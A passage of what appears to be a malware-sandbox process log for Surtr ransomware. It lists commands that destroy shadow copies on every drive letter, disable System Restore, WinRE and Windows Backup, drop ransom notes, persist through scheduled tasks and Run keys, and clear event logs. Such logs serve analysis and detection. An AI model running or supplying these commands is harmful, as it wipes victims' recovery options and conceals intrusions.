  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
  2⤵
  PID:4112
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1136
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
  2⤵
  PID:4428
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    PID:4048
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
  2⤵
  PID:1928
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:2756
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
  2⤵
  PID:2736
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
    3⤵
    PID:4232
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
  2⤵
  PID:4740
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4292
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
  2⤵
  PID:3384
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:3424
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
  2⤵
  PID:4728
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:4684
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
  2⤵
  PID:3820
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4160
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
  2⤵
  PID:4984
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    3⤵
    PID:1312
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
  2⤵
  PID:580
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1504
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
  2⤵
  PID:752
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    3⤵
    PID:4820
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
  2⤵
  PID:4952
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
    3⤵
    PID:4164
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
  2⤵
  PID:4604
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:2892
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
  2⤵
  PID:3224
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:4232
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
  2⤵
  PID:4192
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:3196
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
  2⤵
  PID:288
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4364
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:280
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:4976
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:2544
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:1992
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
  2⤵
  PID:1824
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4872
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:3444
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:824
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
  2⤵
  PID:4952
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:644
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
  2⤵
  PID:2196
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3092
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
  2⤵
  PID:4724
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:4276
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
  2⤵
  PID:1052
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    3⤵
    PID:3344
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
  2⤵
  PID:3352
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1080
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
  2⤵
  PID:1424
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:4340
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:3556
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
  2⤵
  PID:5080
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1240
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:32
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:2360
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
  2⤵
  PID:5108
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4052
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
  2⤵
  PID:2436
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2500
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:1840
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:4228
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:2328
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:1924
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
  2⤵
  PID:4588
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:1112
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:4456
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
  2⤵
  PID:4292
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4844
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
  2⤵
  PID:1492
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:280
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4280
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
  2⤵
  PID:3644
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1260
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:4360
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    - Enumerates connected drives
    PID:3196
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
  2⤵
  PID:4140
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4296
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:824
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:1612
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
  2⤵
  PID:504
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
    3⤵
    PID:4612
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
  2⤵
  PID:4984
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2852
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
  2⤵
  PID:4792
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3352
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:3968
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
  2⤵
  PID:1332
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
  2⤵
  PID:4972
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:5036
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
  2⤵
  PID:3304
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:744
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
  2⤵
  PID:4992
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
  2⤵
  PID:4580
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2892
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
  2⤵
  PID:1180
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2340
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
  2⤵
  PID:2984
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
  2⤵
  PID:4228
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1140
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
  2⤵
  PID:4032
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3376
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
  2⤵
  PID:1312
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3224
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
  2⤵
  PID:4736
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:824
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
  2⤵
  PID:4944
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1616
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
  2⤵
  PID:1668
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4936
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PublicData_d75kolyhzzoec2.surt" "%TEMP%\Service\PublicData_d75kolyhzzoec2.surt"
  2⤵
  PID:3860
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
  2⤵
  PID:1112
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:208
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
  2⤵
  PID:4960
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1828
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
  2⤵
  PID:4220
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2196
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PrivateData_d75kolyhzzoec2.surt" "%TEMP%\Service\PrivateData_d75kolyhzzoec2.surt"
  2⤵
  PID:3340
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
  2⤵
  PID:3920
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
  2⤵
  PID:4696
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
  2⤵
  PID:292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
  2⤵
  PID:5052
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R /S "C:\ProgramData\Service"
    3⤵
    - Views/modifies file attributes
    PID:4984
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
  2⤵
  PID:1624
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
    3⤵
    - Views/modifies file attributes
    PID:3196
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
  2⤵
  PID:1252
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:4720
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
  2⤵
  PID:580
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:3984
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
  2⤵
  - Drops startup file
  PID:4580
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:2400
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:2340
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:1424
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:4308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:1732
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:2836
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:3588
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:2752
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
  2⤵
  PID:4300
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl Setup
    3⤵
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:4720
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
  2⤵
  PID:4728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl System
    3⤵
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:1132
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
  2⤵
  PID:3196
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl Application
    3⤵
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:4600
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
  2⤵
  PID:1928
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl Security
    3⤵
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:1508
- C:\Windows\System32\cmd.exe
